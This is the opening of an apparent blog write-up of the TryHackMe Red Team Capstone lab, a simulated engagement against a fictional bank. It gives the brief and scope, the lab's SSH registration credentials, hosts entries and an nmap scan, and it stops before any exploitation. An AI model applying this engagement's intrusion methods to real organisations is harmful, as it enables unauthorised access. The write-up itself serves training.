{"id":447,"date":"2024-02-18T21:42:54","date_gmt":"2024-02-19T03:42:54","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=447"},"modified":"2024-04-16T20:54:27","modified_gmt":"2024-04-17T01:54:27","slug":"tryhackme-red-team-capstone-challenge","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/","title":{"rendered":"TryHackMe: Red Team Capstone Challenge"},"content":{"rendered":"\n<p>The <a href=\"https:\/\/tryhackme.com\/room\/redteamcapstonechallenge?\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Red Team Capstone challenge<\/a> from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact. To best simulate how these engagements usually occur, there is no single right answer. 
Instead, multiple paths can be used to achieve the final goal.<\/p>\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-tested-learning-objectives-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Tested Learning Objectives<\/mark><\/h2>\n\n\n\n<p>To solve this challenge successfully, the below-listed skills are pre-requisite. 
<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>OSINT&nbsp;(Simulated)<\/li>\n\n\n\n<li>Enumeration &amp; Fuzzing<\/li>\n\n\n\n<li>Phishing<\/li>\n\n\n\n<li>AV&nbsp;Evasion<\/li>\n\n\n\n<li>Lateral Movement<\/li>\n\n\n\n<li>AD&nbsp;Exploitation<\/li>\n\n\n\n<li>Linux&nbsp;and Windows Security Testing<\/li>\n\n\n\n<li>Privilege Escalation<\/li>\n\n\n\n<li>Post-Compromise Exploitation<\/li>\n<\/ul>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"1-project-overview-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Project Overview<\/mark><\/h3>\n\n\n\n<p>TryHackMe, a cybersecurity consultancy firm, has been approached by the government of Trimento to perform a red team engagement against their Reserve Bank (TheReserve).<\/p>\n\n\n\n<p>Trimento is an island country situated in the Pacific. While they may be small in size, they are by no means not wealthy due to foreign investment. Their reserve bank has two main divisions:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Corporate<\/strong>&nbsp;&#8211; The reserve bank of Trimento allows foreign investments, so they have a department that takes care of the country&#8217;s corporate banking clients.<\/li>\n\n\n\n<li><strong>Bank<\/strong>&nbsp;&#8211; The reserve bank of Trimento is in charge of the core banking system in the country, which connects to other banks around the world.<\/li>\n<\/ul>\n\n\n\n<p>The Trimento government has stated that the assessment will cover the entire reserve bank, including both its perimeter and internal networks. They are concerned that the corporate division, while boosting the economy, may be endangering the core banking system due to insufficient segregation. 
The outcome of this red team engagement will determine whether the corporate division should be spun off into its own company.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"2-project-goal-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Project Goal<\/mark><\/h3>\n\n\n\n<p>The purpose of this assessment is to evaluate whether the corporate division can be compromised and, if so, determine if it could compromise the bank division. A simulated fraudulent money transfer must be performed to fully demonstrate the compromise.<\/p>\n\n\n\n<p>To do this safely, TheReserve will create two new core banking accounts for you. You will need to demonstrate that it&#8217;s possible to transfer funds between these two accounts. The only way this is possible is by gaining access to SWIFT, the core backend banking system.<\/p>\n\n\n\n<p><em><strong>Note:<\/strong>&nbsp;SWIFT<\/em>&nbsp;(Society for Worldwide Interbank Financial Telecommunications)&nbsp;<em>is the actual system that is used by banks for backend transfers. In this assessment, a core backend system has been created. However, for security reasons, intentional inaccuracies have been introduced into this process. If you wish to learn more about actual SWIFT and its security, feel free to go do some research! To put it in other words, the information that follows here has been&nbsp;<strong>made up<\/strong>.<\/em><\/p>\n\n\n\n<p>To help you understand the project goal, the government of Trimento has shared some information about the SWIFT backend system. SWIFT runs in an isolated secure environment with restricted access. 
While the word impossible should not be used lightly, the likelihood of the compromise of the actual hosting infrastructure is so slim that it is fair to say that it is impossible to compromise this infrastructure.<\/p>\n\n\n\n<p>However, the SWIFT backend exposes an internal web application at&nbsp;<a href=\"http:\/\/swift.bank.thereserve.loc\/\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/swift.bank.thereserve.loc\/<\/a>,&nbsp;which TheReserve uses to facilitate transfers. The government has provided a general process for transfers. To transfer funds:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>A customer makes a request that funds should be transferred and receives a transfer code.<\/li>\n\n\n\n<li>The customer contacts the bank and provides this transfer code.<\/li>\n\n\n\n<li>An employee with the capturer role authenticates to the SWIFT application and&nbsp;<em>captures<\/em>&nbsp;the transfer.<\/li>\n\n\n\n<li>An employee with the approver role reviews the transfer details and, if verified,&nbsp;<em>approves<\/em>&nbsp;the transfer. 
This has to be performed from a jump host.<\/li>\n\n\n\n<li>Once approval for the transfer is received by the SWIFT network, the transfer is facilitated and the customer is notified.<\/li>\n<\/ol>\n\n\n\n<p>Separation of duties is performed to ensure that no single employee can both capture and approve the same transfer.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"3-project-scope-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Project Scope<\/mark><\/h3>\n\n\n\n<p>This section details the project scope.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"4-in-scope-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">In-Scope<\/mark><\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Security testing of TheReserve&#8217;s internal and external networks, including all IP ranges accessible through your VPN connection.<\/li>\n\n\n\n<li>OSINTing of TheReserve&#8217;s corporate website, which is exposed on the external network of TheReserve. 
Note that this means that all OSINT activities should be limited to the provided network subnet, and no external internet OSINTing is required.<\/li>\n\n\n\n<li>Phishing of any of the employees of TheReserve.<\/li>\n\n\n\n<li>Attacking the mailboxes of TheReserve employees on the WebMail host (.11).<\/li>\n\n\n\n<li>Using any attack methods to complete the goal of performing the transaction between the provided accounts.<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"5-out-of-scope-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Out-of-Scope<\/mark><\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Security testing of any sites not hosted on the network.<\/li>\n\n\n\n<li>Security testing of the TryHackMe VPN (.250) and scoring servers, or attempts to attack any other user connected to the network.<\/li>\n\n\n\n<li>Any security testing on the WebMail server (.11) that alters the mail server configuration or its underlying infrastructure.<\/li>\n\n\n\n<li>Attacking the mailboxes of other red teamers on the WebMail portal (.11).<\/li>\n\n\n\n<li>External (internet) OSINT gathering.<\/li>\n\n\n\n<li>Attacking any hosts outside of the provided subnet range. Once you have completed the questions below, your subnet will be displayed in the network diagram. 
This 10.200.X.0\/24 network is the only in-scope network for this challenge.<\/li>\n\n\n\n<li>Conducting DoS attacks or any attack that renders the network inoperable for other users.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"6-project-registration-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Project Registration<\/mark><\/h3>\n\n\n\n<p>The Trimento government mandates that all red teamers from TryHackMe participating in the challenge must register to allow their single point of contact for the engagement to track activities. As the island&#8217;s network is segregated, this will also provide the testers access to an email account for communication with the government and an approved phishing email address, should phishing be performed.<\/p>\n\n\n\n<p>To register, you need to get in touch with the government through its e-Citizen communication portal that uses SSH for communication. Here are the SSH details provided:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>SSH Username<\/strong><\/td><td>e-citizen<\/td><\/tr><tr><td><strong>SSH Password<\/strong><\/td><td>stabilitythroughcurrency<\/td><\/tr><tr><td><strong>SSH IP<\/strong><\/td><td>X.X.X.250<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Once you complete the questions below, the network diagram at the start of the room will show the IP specific to your network. Use that information to replace the X values in your SSH IP.<\/p>\n\n\n\n<p>Once you authenticate, you will be able to communicate with the e-Citizen system. Follow the prompts to register for the challenge, and save the information you get for future reference. 
Once registered, follow the instructions to verify that you have access to all the relevant systems.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">e-citizen@10.200.113.250<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">e-citizen@10.200.113.250<\/span><span style=\"color: #FFCB6B\">&#39;s password: <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Welcome to the e-Citizen platform!<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Please make a selection:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">[1] Register<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">[2] Authenticate<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">[3] 
Exit<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Selection:1<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Please provide your THM username: ishsome36<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Creating email user<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">User has been succesfully created<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">=======================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Thank you for registering on e-Citizen for the Red Team engagement against TheReserve.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Please take note of the following details and please make sure to save them, as they will not be displayed again.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">=======================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Username: ishsome36<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Password: tZ1Zl-HpHts8F82Y<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MailAddr: ishsome36@corp.th3reserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">IP Range: 10.200.113.0\/24<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">=======================================<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The VPN server and the e-Citizen platform are not in scope for this assessment, and any security testing of these systems may lead to a ban from the challenge.<\/p>\n\n\n\n<p>As you make your way through the network, you will need to prove your compromises. 
To do that, you will be requested to perform specific steps on the host that you have compromised. Please note the hostnames in the network diagram above, as you will need this information. Flags can only be accessed from matching hosts, so even if you have higher access, you will need to lower your access to the specific host required to submit the flag.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"7-submitting-the-flags-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Submitting the Flags<\/mark><\/h3>\n\n\n\n<p>To submit the proof of compromise, connect to the <code>e-citizen<\/code> platform via SSH and select option 2 to authenticate. Use the credentials provided during the registration to authenticate. After successfully authenticating, you will see more options.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b090f2f8c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b090f2f8c\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"862\" data-attachment-id=\"568\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/e-citizen\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?fit=1024%2C862&amp;ssl=1\" data-orig-size=\"1024,862\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" 
data-image-title=\"e-citizen\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?fit=1024%2C862&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=1024%2C862&#038;ssl=1\" alt=\"\" class=\"wp-image-568\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?w=1024&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=300%2C253&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=768%2C647&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We need to select the option that suits us best based on the hosts we compromised. 
For example, if we select the option [1] here, it will ask for the hostname we compromised. The further instructions will tell us how to submit the proof of compromise. Once the proof is submitted, we will get the flag value in our email.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"297\" data-attachment-id=\"493\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206141907\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?fit=1933%2C561&amp;ssl=1\" data-orig-size=\"1933,561\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206141907\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?fit=1024%2C297&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?resize=1024%2C297&#038;ssl=1\" alt=\"\" class=\"wp-image-493\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?resize=1024%2C297&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?resize=300%2C87&amp;ssl=1 300w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?resize=768%2C223&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?resize=1536%2C446&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?w=1933&amp;ssl=1 1933w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>If you don\u2019t want to set up an email client, you can make use of the Roundcube Webmail app at http:\/\/mail.thereserve.loc\/index.php and use the credentials provided during registration to log in.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Once the registration part is done, we can see the hosts and their IP addresses show up on the network diagram.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910155c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910155c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"439\" data-attachment-id=\"452\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206090448\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?fit=1819%2C779&amp;ssl=1\" data-orig-size=\"1819,779\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206090448\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?fit=1024%2C439&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?resize=1024%2C439&#038;ssl=1\" alt=\"\" class=\"wp-image-452\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?resize=1024%2C439&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?resize=300%2C128&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?resize=768%2C329&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?resize=1536%2C658&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?w=1819&amp;ssl=1 1819w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Let&#8217;s add these hosts to our <code>\/etc\/hosts<\/code> file.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.250<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ecitizen.thm<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.13<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">web.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">vpn.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.11<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mail.thereserve.loc<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"8-exploiting-the-external-network-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Exploiting the External 
Network<\/mark><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"9-osint-on-web-machine-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">OSINT on WEB Machine<\/mark><\/h3>\n\n\n\n<p>We will start by running an NMAP scan on the machine to find open ports and the services running on them.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"10-nmap-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">NMAP<\/mark><\/h4>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.6<\/span><span style=\"color: #C3E88D\">p1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Ubuntu<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">ubuntu0.7<\/span><span style=\"color: #BABED8\"> (Ubuntu <\/span><span 
style=\"color: #C3E88D\">Linux<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">protocol<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">2048<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">fe:ee:07:c6:b9:a4:90:5f:ca:71:c8:b6:7b:71:f7:ac<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ca:9d:c8:e4:62:24:56:b2:f6:52:de:de:57:63:ab:fe<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7<\/span><span style=\"color: #C3E88D\">d:21:b1:c5:04:65:2a:ba:18:20:3c:d2:1d:e4:16:32<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">80\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">Apache<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> 
<\/span><span style=\"color: #F78C6C\">2.4<\/span><span style=\"color: #C3E88D\">.29<\/span><span style=\"color: #BABED8\"> ((Ubuntu))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Site<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">doesn<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">t have a title (text\/html).<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">|_http-server-header: Apache\/2.4.29 (Ubuntu)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We have only two ports open:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>22 for SSH<\/li>\n\n\n\n<li>80 for HTTP<\/li>\n<\/ul>\n\n\n\n<p>Since we do not have credentials to connect via SSH, we can move on to enumerating the web server on port 80.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"11-http-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">HTTP<\/mark><\/h4>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" 